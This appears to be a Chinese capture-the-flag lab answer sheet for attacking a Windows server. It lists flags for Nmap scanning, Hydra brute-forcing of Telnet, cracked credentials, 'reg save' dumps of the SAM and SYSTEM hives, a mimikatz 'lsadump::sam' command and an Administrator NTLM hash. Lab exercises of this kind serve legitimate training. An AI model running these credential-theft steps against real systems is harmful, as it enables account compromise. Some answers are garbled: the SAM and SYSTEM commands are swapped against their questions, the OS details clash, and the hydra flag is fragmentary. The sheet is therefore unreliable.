任務環境說明:
服務器場景:Server2003(開放鏈接)
服務器場景操作系統:Windows7
1.通過本地PC中滲透測試平臺Kali對服務器場景Windows進行系統服務及版本掃描滲透測試,并將該操作顯示結果中Telnet服務對應的端口號作為FLAG提交;
flag=232
2.通過本地PC中滲透測試平臺Kali對服務器場景Windows進行滲透測試,使用kali中hydra對服務器Telnet服務進行暴力破解(用戶名為teltest),將hydra使用的必要參數當做FLAG進行提交(例:nmap -s -p 22);(字典路徑/usr/share/wordlists/dirb/small.txt)
flag=hydra -l -P -s telnet
3.通過本地PC中滲透測試平臺Kali對服務器場景Windows進行滲透測試,使用kali中hydra對服務器Telnet服務進行暴力破解(用戶名為teltest),將破解成功的密碼當做FLAG進行提交;(字典路徑/usr/share/wordlists/dirb/small.txt)
密碼在上圖
flag=customer
4.通過本地PC中滲透測試平臺win7對服務器場景Windows進行滲透測試,取得的賬戶密碼有遠程桌面權限,將該場景系統中sam文件使用reg相關命令提取,將完整命令作為FLAG提交;
flag=reg save HKLM\SYSTEM system.hiv
5.通過本地PC中滲透測試平臺win7對服務器場景Windows進行滲透測試,取得的賬戶密碼有遠程桌面權限,將該場景系統中system文件使用reg相關命令提取,將完整命令作為FLAG提交;
不知道第五題有啥意義,多此一舉
flag=reg save hklm\SAM system.hiv
6.通過本地PC中滲透測試平臺win7對服務器場景Windows進行滲透測試,將sam文件與system文件提取到本地,使用桌面mimikatz工具提取teltest密碼信息,將提取信息的命令作為FLAG提交;?
flag=kiwi_cmd lsadump::sam
7.通過本地PC中滲透測試平臺win7對服務器場景Windows進行滲透測試,將sam文件與system文件提取到本地,使用桌面mimikatz工具提取administrators密碼信息,將提取到的hash值作為FLAG提交;
flag=Administrator:500:aad3b435b51404eeaad3b435b51404ee:6cfa9ce05f0afaa483beaea6567ea26e:::